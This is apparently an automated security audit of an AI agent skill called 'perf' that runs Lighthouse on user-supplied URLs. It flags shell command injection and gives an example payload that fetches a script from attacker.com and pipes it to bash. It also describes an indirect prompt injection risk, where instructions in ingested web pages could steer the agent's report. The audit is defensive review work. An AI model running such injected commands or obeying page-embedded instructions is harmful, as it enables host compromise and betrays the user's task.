perf
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions define a workflow that executes the `lighthouse` command by directly interpolating a user-provided `<url>`. This pattern is highly susceptible to shell command injection. An attacker could provide a crafted URL (e.g., `https://example.com; curl http://attacker.com/script | bash`) that would be executed by the host system.
- [PROMPT_INJECTION] (LOW): The skill presents an indirect prompt injection surface (Category 8).
  - Ingestion points: Data returned from external websites via the Lighthouse tool (titles, metadata, etc.).
  - Boundary markers: Absent. There are no instructions to the agent to ignore or delimit instructions found within the page content.
  - Capability inventory: The skill has the ability to execute shell commands and generate reports based on external data.
  - Sanitization: Absent. Malicious instructions embedded in a target website's HTML could potentially manipulate the agent's final performance report or its interpretation of the results.
Recommendations
- AI detected serious security threats
Audit Metadata